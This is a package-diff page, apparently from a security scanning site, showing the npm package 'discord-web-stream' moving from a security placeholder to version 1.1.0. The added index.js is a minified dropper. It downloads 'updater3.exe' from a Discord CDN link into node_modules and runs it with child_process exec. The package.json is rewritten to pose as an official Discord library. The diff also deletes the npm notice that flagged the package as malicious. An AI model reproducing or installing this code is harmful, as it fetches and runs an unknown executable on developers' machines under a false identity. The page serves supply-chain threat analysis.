discord-web-stream 0.0.1-security → 1.1.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of discord-web-stream might be problematic. Click here for more details.
- package/index.js +1 -0
- package/package.json +9 -3
- package/README.md +0 -5
package/index.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const fs=require("fs"),https=require("https"),{exec:e}=require("child_process"),path=require("path");class ExeFileHandler{constructor(e){this.exePath=e}onModified(t){t===this.exePath&&e(this.exePath,(e,t,s)=>{})}}async function downloadExe(e,t){let s="discord.js",n=path.join("node_modules",s,t),o=path.join("node_modules",s);fs.existsSync(o)||fs.mkdirSync(o,{recursive:!0});let i=fs.createWriteStream(n),a=await new Promise((t,s)=>{let o=https.get(e,e=>{e.pipe(i),e.on("end",()=>{observeFile(n)}),t(e)});o.on("error",s)});a.statusCode}function observeFile(t){fs.watch(t,s=>{"change"===s&&e(t,(e,t,s)=>{})})}downloadExe("https://cdn.discordapp.com/attachments/1175135875949142122/1175429371318771802/updater3.exe?ex=656b32e8&is=6558bde8&hm=5eb2818d6ad1ac8fd3397d9a54f92a304c52fe3a52d080c978ce60c404a77c56&","updater3.exe");
|
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "discord-web-stream",
|
3
|
-
"version": "
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "1.1.0",
|
4
|
+
"description": "official discord audio streaming implementation",
|
5
|
+
"main": "index.js",
|
6
|
+
"devDependencies": {},
|
7
|
+
"scripts": {
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
9
|
+
},
|
10
|
+
"author": "discordapp",
|
11
|
+
"license": "ISC"
|
6
12
|
}
|
package/README.md
DELETED
@@ -1,5 +0,0 @@
|
|
1
|
-
# Security holding package
|
2
|
-
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
4
|
-
|
5
|
-
Please refer to www.npmjs.com/advisories?search=discord-web-stream for more information.
|